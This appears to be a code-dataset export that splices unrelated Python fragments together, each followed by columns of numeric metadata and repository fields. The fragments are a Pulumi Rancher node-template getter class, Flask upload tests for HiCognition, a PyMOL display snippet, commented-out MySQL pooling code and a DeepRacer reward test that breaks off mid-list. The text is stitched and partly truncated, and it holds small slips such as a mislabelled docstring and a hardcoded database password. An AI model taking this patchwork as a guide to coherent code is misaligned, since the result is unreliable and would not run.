def node_taints(self) -> pulumi.Output[Optional[Sequence['outputs.NodeTemplateNodeTaint']]]:
"""
Node taints. For Rancher v2.3.3 or above (List)
"""
return pulumi.get(self, "node_taints")
@property
@pulumi.getter(name="opennebulaConfig")
def opennebula_config(self) -> pulumi.Output[Optional['outputs.NodeTemplateOpennebulaConfig']]:
"""
Opennebula config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "opennebula_config")
@property
@pulumi.getter(name="openstackConfig")
def openstack_config(self) -> pulumi.Output[Optional['outputs.NodeTemplateOpenstackConfig']]:
"""
Openstack config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "openstack_config")
@property
@pulumi.getter(name="useInternalIpAddress")
def use_internal_ip_address(self) -> pulumi.Output[Optional[bool]]:
"""
Engine storage driver for the node template (bool)
"""
return pulumi.get(self, "use_internal_ip_address")
@property
@pulumi.getter(name="vsphereConfig")
def vsphere_config(self) -> pulumi.Output[Optional['outputs.NodeTemplateVsphereConfig']]:
"""
vSphere config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "vsphere_config")
| 49.190574
| 191
| 0.672152
| 7,994
| 72,015
| 5.831123
| 0.038029
| 0.088257
| 0.093341
| 0.054061
| 0.957781
| 0.952976
| 0.94137
| 0.939074
| 0.936693
| 0.920217
| 0
| 0.00433
| 0.22076
| 72,015
| 1,463
| 192
| 49.224197
| 0.826327
| 0.315184
| 0
| 0.905119
| 1
| 0
| 0.158665
| 0.088284
| 0
| 0
| 0
| 0
| 0
| 1
| 0.168539
| false
| 0.001248
| 0.008739
| 0
| 0.278402
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6f21b04b069c85910c0a3464783dc84c779b1f01
| 24,508
|
py
|
Python
|
back_end/tests/post_routes/test_api_add_datasets.py
|
gerlichlab/HiCognition
|
dff022025b7c83732b9510ff5ca8232d30aa5304
|
[
"MIT"
] | null | null | null |
back_end/tests/post_routes/test_api_add_datasets.py
|
gerlichlab/HiCognition
|
dff022025b7c83732b9510ff5ca8232d30aa5304
|
[
"MIT"
] | 5
|
2022-03-31T11:54:12.000Z
|
2022-03-31T12:04:29.000Z
|
back_end/tests/post_routes/test_api_add_datasets.py
|
gerlichlab/HiCognition
|
dff022025b7c83732b9510ff5ca8232d30aa5304
|
[
"MIT"
] | null | null | null |
"""Module with tests realted adding datasets."""
import os
import io
import json
import unittest
from unittest.mock import patch
from hicognition.test_helpers import LoginTestCase, TempDirTestCase
# add path to import app
# import sys
# sys.path.append("./")
from app.models import Dataset, Assembly
from app import db
class TestAddDataSets(LoginTestCase, TempDirTestCase):
"""Tests correct launching of
pipelines after addition of datasets.
Inherits both from LoginTest and TempDirTestCase
to be able to login and make temporary directory"""
maxDiff = None
def setUp(self):
super().setUp()
# add assembly
self.hg19 = Assembly(
id=1,
name="hg19",
chrom_sizes=self.app.config["CHROM_SIZES"],
chrom_arms=self.app.config["CHROM_ARMS"],
)
db.session.add(self.hg19)
db.session.commit()
# add token headers
token = self.add_and_authenticate("test", "asdf")
# create token_header
self.token_headers = self.get_token_header(token)
# add content-type
self.token_headers["Content-Type"] = "multipart/form-data"
@patch("app.api.post_routes.parse_binsizes")
@patch("app.models.User.launch_task")
def test_dataset_added_correctly_cooler(self, mock_launch, mock_parse_binsizes):
"""Tests whether a cooler dataset is added
correctly to the Dataset table following
a post request."""
# define return values
mock_parse_binsizes.return_value = [5000000]
# construct form data
data = {
"datasetName": "test",
"description": "test-description",
"assembly": "1",
"cellCycleStage": "asynchronous",
"perturbation": "No perturbation",
"ValueType": "Interaction",
"Method": "HiC",
"Normalization": "ICCF",
"filetype": "cooler",
"public": "false",
"file": (open("tests/testfiles/test.mcool", "rb"), "test.mcool"),
}
# dispatch post request
response = self.client.post(
"/api/datasets/",
data=data,
headers=self.token_headers,
content_type="multipart/form-data",
)
self.assertEqual(response.status_code, 200)
# check whether dataset has been added to database
self.assertEqual(len(Dataset.query.all()), 1)
dataset = Dataset.query.first()
expected = {
"normalization": "ICCF",
"dataset_name": "test",
"processing_state": "uploaded",
"description": "test-description",
"perturbation": "No perturbation",
"file_path": "./tmp_test/1_test.mcool",
"assembly": 1,
"public": False,
"processing_datasets": [],
"failed_datasets": [],
"processing_collections": [],
"failed_collections": [],
"cellCycleStage": "asynchronous",
"valueType": "Interaction",
"filetype": "cooler",
"method": "HiC",
"available_binsizes": '["5000000"]',
"user_id": 1,
"id": 1,
}
self.assertEqual(expected, dataset.to_json())
# test whether uploaded file exists
self.assertTrue(os.path.exists(dataset.file_path))
# test whether uploaded file is equal to expected file
expected_file = open("tests/testfiles/test.mcool", "rb").read()
actual_file = open(dataset.file_path, "rb").read()
self.assertEqual(expected_file, actual_file)
@patch("app.models.User.launch_task")
def test_dataset_added_correctly_bigwig_bw_ending(self, mock_launch):
"""Tests whether a bigwig dataset is added
correctly to the Dataset table following
a post request."""
# construct form data
data = {
"datasetName": "test",
"assembly": "1",
"cellCycleStage": "asynchronous",
"perturbation": "No perturbation",
"description": "test-description",
"ValueType": "ChromatinAssociation",
"Protein": "CTCF",
"public": "false",
"Method": "ChipSeq",
"Normalization": "RPM",
"filetype": "bigwig",
"file": (open("tests/testfiles/test.bw", "rb"), "test.bw"),
}
# dispatch post request
response = self.client.post(
"/api/datasets/",
data=data,
headers=self.token_headers,
content_type="multipart/form-data",
)
self.assertEqual(response.status_code, 200)
# check whether dataset has been added to database
self.assertEqual(len(Dataset.query.all()), 1)
dataset = Dataset.query.first()
expected = {
"method": "ChipSeq",
"id": 1,
"user_id": 1,
"normalization": "RPM",
"dataset_name": "test",
"processing_state": "uploaded",
"description": "test-description",
"perturbation": "No perturbation",
"file_path": "./tmp_test/1_test.bw",
"processing_datasets": [],
"failed_datasets": [],
"processing_collections": [],
"failed_collections": [],
"assembly": 1,
"public": False,
"cellCycleStage": "asynchronous",
"protein": "CTCF",
"valueType": "ChromatinAssociation",
"filetype": "bigwig",
}
self.assertEqual(expected, dataset.to_json())
# test whether uploaded file exists
self.assertTrue(os.path.exists(dataset.file_path))
# test whether uploaded file is equal to expected file
with open("tests/testfiles/test.bw", "rb") as expected_file, open(
dataset.file_path, "rb"
) as actual_file:
self.assertEqual(expected_file.read(), actual_file.read())
@patch("app.models.User.launch_task")
def test_dataset_added_correctly_bigwig_bigwig_ending(self, mock_launch):
"""Tests whether a bigwig dataset is added
correctly to the Dataset table following
a post request."""
# construct form data
data = {
"datasetName": "test",
"assembly": "1",
"cellCycleStage": "asynchronous",
"perturbation": "No perturbation",
"description": "test-description",
"ValueType": "ChromatinAssociation",
"processing_datasets": [],
"Protein": "CTCF",
"public": "false",
"Method": "ChipSeq",
"Normalization": "RPM",
"filetype": "bigwig",
"file": (open("tests/testfiles/test.bigwig", "rb"), "test.bigwig"),
}
# dispatch post request
response = self.client.post(
"/api/datasets/",
data=data,
headers=self.token_headers,
content_type="multipart/form-data",
)
self.assertEqual(response.status_code, 200)
# check whether dataset has been added to database
self.assertEqual(len(Dataset.query.all()), 1)
dataset = Dataset.query.first()
expected = {
"method": "ChipSeq",
"id": 1,
"user_id": 1,
"normalization": "RPM",
"dataset_name": "test",
"processing_state": "uploaded",
"description": "test-description",
"perturbation": "No perturbation",
"file_path": "./tmp_test/1_test.bigwig",
"processing_datasets": [],
"failed_datasets": [],
"processing_collections": [],
"failed_collections": [],
"assembly": 1,
"public": False,
"cellCycleStage": "asynchronous",
"protein": "CTCF",
"valueType": "ChromatinAssociation",
"filetype": "bigwig",
}
self.assertEqual(expected, dataset.to_json())
# test whether uploaded file exists
self.assertTrue(os.path.exists(dataset.file_path))
# test whether uploaded file is equal to expected file
with open("tests/testfiles/test.bw", "rb") as expected_file, open(
dataset.file_path, "rb"
) as actual_file:
self.assertEqual(expected_file.read(), actual_file.read())
@patch("app.api.post_routes.parse_binsizes")
@patch("app.models.User.launch_task")
def test_dataset_added_correctly_cooler_wo_description(
self, mock_launch, mock_parse_binsizes
):
"""Tests whether a cooler dataset is added
correctly to the Dataset table following
a post request."""
# add return values
mock_parse_binsizes.return_value = [5000000]
# construct form data
data = {
"datasetName": "test",
"assembly": "1",
"cellCycleStage": "asynchronous",
"perturbation": "No perturbation",
"ValueType": "Interaction",
"Method": "HiC",
"public": "false",
"Normalization": "ICCF",
"filetype": "cooler",
"file": (open("tests/testfiles/test.mcool", "rb"), "test.mcool"),
}
# dispatch post request
response = self.client.post(
"/api/datasets/",
data=data,
headers=self.token_headers,
content_type="multipart/form-data",
)
# import pdb; pdb.set_trace()
self.assertEqual(response.status_code, 200)
# check whether dataset has been added to database
self.assertEqual(len(Dataset.query.all()), 1)
dataset = Dataset.query.first()
expected = {
"normalization": "ICCF",
"dataset_name": "test",
"processing_state": "uploaded",
"description": "No description provided",
"perturbation": "No perturbation",
"file_path": "./tmp_test/1_test.mcool",
"processing_datasets": [],
"failed_datasets": [],
"processing_collections": [],
"failed_collections": [],
"assembly": 1,
"public": False,
"cellCycleStage": "asynchronous",
"valueType": "Interaction",
"filetype": "cooler",
"method": "HiC",
"available_binsizes": '["5000000"]',
"user_id": 1,
"id": 1,
}
self.assertEqual(expected, dataset.to_json())
# check whether binsizes have been added correctly -> test cooler contains single resolution with size 5 * 10**6
self.assertEqual(json.loads(dataset.available_binsizes), ["5000000"])
@patch("app.models.User.launch_task")
def test_dataset_added_correctly_bed(self, mock_launch):
"""Tests whether a bed dataset is added
correctly to the Dataset table following
a post request."""
# construct form data
data = {
"datasetName": "test",
"assembly": "1",
"description": "test-description",
"cellCycleStage": "asynchronous",
"perturbation": "No perturbation",
"ValueType": "Derived",
"public": "false",
"Method": "HiC",
"SizeType": "Interval",
"filetype": "bedfile",
"file": (io.BytesIO(b"abcdef"), "test.bed"),
}
# dispatch post request
response = self.client.post(
"/api/datasets/",
data=data,
headers=self.token_headers,
content_type="multipart/form-data",
)
self.assertEqual(response.status_code, 200)
# check whether dataset has been added to database
self.assertEqual(len(Dataset.query.all()), 1)
dataset = Dataset.query.first()
expected = {
"dataset_name": "test",
"processing_state": "processing",
"description": "test-description",
"sizeType": "Interval",
"perturbation": "No perturbation",
"file_path": "./tmp_test/1_test.bed",
"processing_datasets": [],
"failed_datasets": [],
"processing_collections": [],
"failed_collections": [],
"assembly": 1,
"public": False,
"cellCycleStage": "asynchronous",
"valueType": "Derived",
"filetype": "bedfile",
"method": "HiC",
"user_id": 1,
"id": 1,
}
self.assertEqual(expected, dataset.to_json())
# test whether uploaded file exists
self.assertTrue(os.path.exists(dataset.file_path))
# test whether uploaded file is equal to expected file
expected_file = b"abcdef"
with open(dataset.file_path, "rb") as actual_file:
self.assertEqual(expected_file, actual_file.read())
@patch("app.models.User.launch_task")
def test_incorrect_filetype_is_rejected(self, mock_launch):
"""Tests whether incorrect filetype is rejected"""
# construct form data
data = {
"datasetName": "test",
"assembly": "1",
"description": "test-description",
"cellCycleStage": "asynchronous",
"perturbation": "No perturbation",
"ValueType": "Derived",
"public": "false",
"Method": "HiC",
"SizeType": "Interval",
"filetype": "bad",
"file": (io.BytesIO(b"abcdef"), "test.bed"),
"Directionality": "-",
}
# dispatch post request
response = self.client.post(
"/api/datasets/",
data=data,
headers=self.token_headers,
content_type="multipart/form-data",
)
self.assertEqual(response.status_code, 400)
@patch("app.models.User.launch_task")
def test_bed_pipeline_launched_correctly(self, mock_launch):
"""Tests whether bed pipeline is called with the right arguments."""
# construct form data
data = {
"datasetName": "test",
"assembly": "1",
"description": "test-description",
"cellCycleStage": "asynchronous",
"perturbation": "No perturbation",
"ValueType": "Derived",
"Method": "HiC",
"public": "false",
"SizeType": "Interval",
"filetype": "bedfile",
"file": (io.BytesIO(b"abcdef"), "test.bed"),
"Directionality": "-",
}
# dispatch post request
response = self.client.post(
"/api/datasets/",
data=data,
headers=self.token_headers,
content_type="multipart/form-data",
)
# check whether launch task has been called with the right arguments
mock_launch.assert_called_with(
self.app.queues["short"], "pipeline_bed", "run bed preprocessing", 1
)
def test_badform_no_dataset_name(self):
"""Tests whether form without datasetName is rejected"""
# construct form data
data = {
"assembly": "1",
"description": "test-description",
"cellCycleStage": "asynchronous",
"perturbation": "No perturbation",
"ValueType": "Derived",
"public": "false",
"Method": "HiC",
"SizeType": "Interval",
"filetype": "bedfile",
"file": (io.BytesIO(b"abcdef"), "test.bed"),
"Directionality": "-",
}
# dispatch post request
response = self.client.post(
"/api/datasets/",
data=data,
headers=self.token_headers,
content_type="multipart/form-data",
)
self.assertEqual(response.status_code, 400)
def test_badform_no_file_object(self):
"""Tests whether form without file is rejected"""
# construct form data
data = {
"datasetName": "IE",
"assembly": "1",
"description": "test-description",
"cellCycleStage": "asynchronous",
"perturbation": "No perturbation",
"ValueType": "Derived",
"public": "false",
"Method": "HiC",
"SizeType": "Interval",
"filetype": "bedfile",
"Directionality": "-",
}
# dispatch post request
response = self.client.post(
"/api/datasets/",
data=data,
headers=self.token_headers,
content_type="multipart/form-data",
)
self.assertEqual(response.status_code, 400)
def test_badform_bed_file_cooler_filetype(self):
"""Tests whether form with bedfile, but cooler file-ending is rejected"""
# construct form data
data = {
"datasetName": "test",
"assembly": "1",
"description": "test-description",
"cellCycleStage": "asynchronous",
"perturbation": "No perturbation",
"ValueType": "Derived",
"public": "false",
"Method": "HiC",
"SizeType": "Interval",
"filetype": "bedfile",
"file": (io.BytesIO(b"abcdef"), "test.mcool"),
"Directionality": "-",
}
# dispatch post request
response = self.client.post(
"/api/datasets/",
data=data,
headers=self.token_headers,
content_type="multipart/form-data",
)
self.assertEqual(response.status_code, 400)
def test_badform_cooler_file_bed_filetype(self):
"""Tests whether form with cooler, but bed file-ending is rejected"""
# construct form data
data = {
"datasetName": "test",
"description": "test-description",
"assembly": "1",
"cellCycleStage": "asynchronous",
"perturbation": "No perturbation",
"public": "false",
"ValueType": "Interaction",
"Method": "HiC",
"Normalization": "ICCF",
"filetype": "cooler",
"file": (open("tests/testfiles/test.mcool", "rb"), "test.bed"),
}
# dispatch post request
response = self.client.post(
"/api/datasets/",
data=data,
headers=self.token_headers,
content_type="multipart/form-data",
)
self.assertEqual(response.status_code, 400)
def test_badform_no_fileending_rejected(self):
"""Tests whether form with file without ending is rejected."""
# construct form data
data = {
"datasetName": "test",
"assembly": "1",
"description": "test-description",
"cellCycleStage": "asynchronous",
"perturbation": "No perturbation",
"ValueType": "SetIdentity",
"public": "false",
"Method": "HiC",
"SizeType": "Interval",
"filetype": "bedfile",
"file": (io.BytesIO(b"abcdef"), "test"),
"Directionality": "-",
}
# dispatch post request
response = self.client.post(
"/api/datasets/",
data=data,
headers=self.token_headers,
content_type="multipart/form-data",
)
self.assertEqual(response.status_code, 400)
def test_wrongly_formatted_bedfile_rejected(self):
"""Tests whether form with wrongly formatted bedfile is rejected."""
# construct form data
data = {
"datasetName": "test",
"assembly": "1",
"description": "test-description",
"cellCycleStage": "asynchronous",
"perturbation": "No perturbation",
"ValueType": "SetIdentity",
"Method": "HiC",
"public": "false",
"SizeType": "Interval",
"filetype": "bedfile",
"file": open("tests/testfiles/wrongly_formatted_bedfile.bed", "rb"),
"Directionality": "-",
}
# dispatch post request
response = self.client.post(
"/api/datasets/",
data=data,
headers=self.token_headers,
content_type="multipart/form-data",
)
self.assertEqual(response.status_code, 400)
# check whether database entry was removed
self.assertEqual(0, len(Dataset.query.all()))
# test whether file was removed, filename will bed 1_wrongly_formatted_bedfile.bed
self.assertFalse(
os.path.exists(
os.path.join(
TempDirTestCase.TEMP_PATH, "1_wrongly_formatted_bedfile.bed"
)
)
)
def test_wrongly_formatted_coolerfile_rejected(self):
"""Tests whether form with wrongly formatted/corrupted coolerfile is
rejected."""
# construct form data
data = {
"datasetName": "test",
"description": "test-description",
"assembly": "1",
"cellCycleStage": "asynchronous",
"perturbation": "No perturbation",
"ValueType": "Interaction",
"public": "false",
"Method": "HiC",
"Normalization": "ICCF",
"filetype": "cooler",
"file": (open("tests/testfiles/bad_cooler.mcool", "rb"), "test.mcool"),
}
# dispatch post request
response = self.client.post(
"/api/datasets/",
data=data,
headers=self.token_headers,
content_type="multipart/form-data",
)
self.assertEqual(response.status_code, 400)
# check whether database entry was removed
self.assertEqual(0, len(Dataset.query.all()))
# test whether file was removed, filename will bed 1_bad_cooler.mcool
self.assertFalse(
os.path.exists(
os.path.join(TempDirTestCase.TEMP_PATH, "1_bad_cooler.mcool")
)
)
@patch("app.models.User.launch_task")
def test_public_flag_set_correctly_if_true(self, mock_launch_task):
"""Tests whether form with file without ending is rejected."""
# construct form data
data = {
"datasetName": "test",
"assembly": "1",
"description": "test-description",
"cellCycleStage": "asynchronous",
"perturbation": "No perturbation",
"ValueType": "Derived",
"public": "true",
"Method": "HiC",
"SizeType": "Interval",
"filetype": "bedfile",
"file": (io.BytesIO(b"abcdef"), "test.bed"),
"Directionality": "-",
}
# dispatch post request
response = self.client.post(
"/api/datasets/",
data=data,
headers=self.token_headers,
content_type="multipart/form-data",
)
self.assertEqual(response.status_code, 200)
# check if public flag is set correctly
dataset = Dataset.query.get(1)
self.assertTrue(dataset.public)
@patch("app.models.User.launch_task")
def test_public_flag_set_correctly_if_false(self, mock_launch_task):
"""Tests whether form with file without ending is rejected."""
# construct form data
data = {
"datasetName": "test",
"assembly": "1",
"description": "test-description",
"cellCycleStage": "asynchronous",
"perturbation": "No perturbation",
"ValueType": "Derived",
"public": "false",
"Method": "HiC",
"SizeType": "Interval",
"filetype": "bedfile",
"file": (io.BytesIO(b"abcdef"), "test.bed"),
"Directionality": "-",
}
# dispatch post request
response = self.client.post(
"/api/datasets/",
data=data,
headers=self.token_headers,
content_type="multipart/form-data",
)
self.assertEqual(response.status_code, 200)
# check if public flag is set correctly
dataset = Dataset.query.get(1)
self.assertFalse(dataset.public)
if __name__ == "__main__":
res = unittest.main(verbosity=3, exit=False)
| 37.021148
| 120
| 0.545944
| 2,247
| 24,508
| 5.829996
| 0.098353
| 0.020153
| 0.041679
| 0.029847
| 0.865878
| 0.847405
| 0.832137
| 0.826718
| 0.804122
| 0.794886
| 0
| 0.008596
| 0.325934
| 24,508
| 661
| 121
| 37.077156
| 0.784383
| 0.133589
| 0
| 0.78453
| 0
| 0
| 0.291264
| 0.039083
| 0
| 0
| 0
| 0
| 0.075506
| 1
| 0.031308
| false
| 0
| 0.014733
| 0
| 0.049724
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f43acebc81a7119fe49a4acd70b1975a9c1442b
| 1,334
|
py
|
Python
|
NucleicAcids/nucleicAcidBackboneTubesSticks.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
NucleicAcids/nucleicAcidBackboneTubesSticks.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
NucleicAcids/nucleicAcidBackboneTubesSticks.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
# Description: This code shows the cartoon backbone tube as 65% transparent. It hides the rungs of the cartoon. It shows all of the non-H atoms are sticks. The motivation is to have the cartoon highlight the backbone without dominanting the scene.
# Source: Develop ab initio.
"""
cmd.do('set bg_rgb, white;')
cmd.do('hide everything, all;')
cmd.do('# Change to the name of your molecular object.;')
cmd.do('show cartoon, ${1:3nd3};')
cmd.do('set cartoon_sampling,1;')
cmd.do('set cartoon_tube_radius, 0.5;')
cmd.do('set cartoon_ladder_mode, 0;')
cmd.do('# Set to 0.0 to turn off transparency;')
cmd.do('set cartoon_transparency, ${2:0.65};')
cmd.do('# The default strick radisu is 0.25. I think it is too thick.;')
cmd.do('set stick_radius ${3:0.12};')
cmd.do('show sticks;')
cmd.do('hide sticks, element H;')
"""
cmd.do('set bg_rgb, white;')
cmd.do('hide everything, all;')
cmd.do('# Change to the name of your molecular object.;')
cmd.do('show cartoon, 3nd3;')
cmd.do('set cartoon_sampling,1;')
cmd.do('set cartoon_tube_radius, 0.5;')
cmd.do('set cartoon_ladder_mode, 0;')
cmd.do('# Set to 0.0 to turn off transparency;')
cmd.do('set cartoon_transparency, 0.65;')
cmd.do('# The default strick radisu is 0.25. I think it is too thick.;')
cmd.do('set stick_radius 0.12;')
cmd.do('show sticks;')
cmd.do('hide sticks, element H;')
| 40.424242
| 248
| 0.704648
| 241
| 1,334
| 3.834025
| 0.294606
| 0.140693
| 0.121212
| 0.12987
| 0.75974
| 0.75974
| 0.75974
| 0.75974
| 0.75974
| 0.75974
| 0
| 0.033534
| 0.128186
| 1,334
| 32
| 249
| 41.6875
| 0.760963
| 0.603448
| 0
| 0
| 0
| 0
| 0.715385
| 0.040385
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f5240feb7fd863cf7805added822224cb0d3f6a
| 2,525
|
py
|
Python
|
components/components/utils/pools.py
|
qwert-f/flask
|
00c350f8190c2a6c0eee55031aca0873eb4c91ee
|
[
"MIT"
] | null | null | null |
components/components/utils/pools.py
|
qwert-f/flask
|
00c350f8190c2a6c0eee55031aca0873eb4c91ee
|
[
"MIT"
] | 1
|
2022-01-18T02:54:04.000Z
|
2022-01-18T02:54:44.000Z
|
components/components/utils/pools.py
|
qwert-f/flask
|
00c350f8190c2a6c0eee55031aca0873eb4c91ee
|
[
"MIT"
] | null | null | null |
# # import time
# import pymysql
# # import threading
# # from flask import current_app
# from dbutils.pooled_db import PooledDB
# # ModuleNotFoundError: No module named 'DBUtils'报错的原因是版本是2.0而下面的写法是1.3的写法
# # from DBUtils.PooledDB import PooledDB, SharedDBConnection
#
#
# 方法1.1
# def init_pool(app):
# POOL = PooledDB(
# creator=pymysql, # 使用链接数据库的模块
# maxconnections=6, # 连接池允许的最大连接数,0和None表示不限制连接数
# mincached=2, # 初始化时,链接池中至少创建的空闲的链接,0表示不创建
# maxcached=5, # 链接池中最多闲置的链接,0和None不限制
# maxshared=3, # 链接池中最多共享的链接数量,0和None表示全部共享。
# # PS: 无用,因为pymysql和MySQLdb等模块的 threadsafety都为1,
# # 所有值无论设置为多少,_maxcached永远为0,所以永远是所有链接都共享。
#
# blocking=True, # 连接池中如果没有可用连接后,是否阻塞等待。True,等待;False,不等待然后报错
# maxusage=None, # 一个链接最多被重复使用的次数,None表示无限制
# setsession=[], # 开始会话前执行的命令列表。
# # 如:["set datestyle to ...", "set time zone ..."]
# ping=0,
# # ping MySQL服务端,检查是否服务可用。# 如:0 = None = never,
# # 1 = default = whenever it is requested,
# # 2 = when a cursor is created,
# # 4 = when a query is executed, 7 = always
# host=app.config['PYMYSQL_HOST'],
# port=3306,
# user='root',
# password='sql1',
# database='daily',
# charset='utf8'
# )
# app.config['PYMYSQL_POOL'] = POOL
# 方法2
# import pymysql
# # import threading
# from dbutils.pooled_db import PooledDB
# # ModuleNotFoundError: No module named 'DBUtils'报错的原因是版本是2.0而下面的写法是1.3的写法
# # from DBUtils.PooledDB import PooledDB, SharedDBConnection
# from flask import current_app
# POOL = PooledDB(
# creator=pymysql, # 使用链接数据库的模块
# maxconnections=6, # 连接池允许的最大连接数,0和None表示不限制连接数
# mincached=2, # 初始化时,链接池中至少创建的空闲的链接,0表示不创建
# maxcached=5, # 链接池中最多闲置的链接,0和None不限制
# maxshared=3, # 链接池中最多共享的链接数量,0和None表示全部共享。
# # PS: 无用,因为pymysql和MySQLdb等模块的 threadsafety都为1,
# # 所有值无论设置为多少,_maxcached永远为0,所以永远是所有链接都共享。
#
# blocking=True, # 连接池中如果没有可用连接后,是否阻塞等待。True,等待;False,不等待然后报错
# maxusage=None, # 一个链接最多被重复使用的次数,None表示无限制
# setsession=[], # 开始会话前执行的命令列表。
# # 如:["set datestyle to ...", "set time zone ..."]
# ping=0,
# # ping MySQL服务端,检查是否服务可用。# 如:0 = None = never,
# # 1 = default = whenever it is requested, 2 = when a cursor is created,
# # 4 = when a query is executed, 7 = always
# host=current_app.config['PYMYSQL_HOST'],
# port=3306,
# user='root',
# password='sql1',
# database='daily',
# charset='utf8'
# )
| 36.071429
| 77
| 0.639604
| 261
| 2,525
| 6.145594
| 0.386973
| 0.027431
| 0.029925
| 0.034913
| 0.963217
| 0.899002
| 0.899002
| 0.899002
| 0.899002
| 0.899002
| 0
| 0.028409
| 0.233267
| 2,525
| 69
| 78
| 36.594203
| 0.800103
| 0.929505
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6f69b0328b0111c46976f1f24e67939f278e6126
| 83,591
|
py
|
Python
|
tboneRewardSM_test.py
|
thh0003/DeepRacer
|
0e639585e8d33a9157c262b7d7cb99e60b0dffc8
|
[
"Apache-2.0"
] | null | null | null |
tboneRewardSM_test.py
|
thh0003/DeepRacer
|
0e639585e8d33a9157c262b7d7cb99e60b0dffc8
|
[
"Apache-2.0"
] | null | null | null |
tboneRewardSM_test.py
|
thh0003/DeepRacer
|
0e639585e8d33a9157c262b7d7cb99e60b0dffc8
|
[
"Apache-2.0"
] | 1
|
2021-02-12T10:06:51.000Z
|
2021-02-12T10:06:51.000Z
|
# model name:
#
from tboneDeepRacerUtils import calcDistanceFromCenter, getClosestWaypoints, getDistanceCenterLine,getCurLocation,inside_borders,speed,progress,direction_and_waypoint,follow_centerline
from tboneDeepRacerHistory import HISTORY
from tboneDeepRacerRaceStep import RaceStep
from tboneRewardSM import reward_function
#stepRewardsCSV = open ("stepRewards.csv", "w", newline='')
#stepLocationsCSV = open ("stepLocations.csv", "w", newline='')
def main():
params = [
{'is_left_of_center': False, 'projection_distance': 0.1399085926407269, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 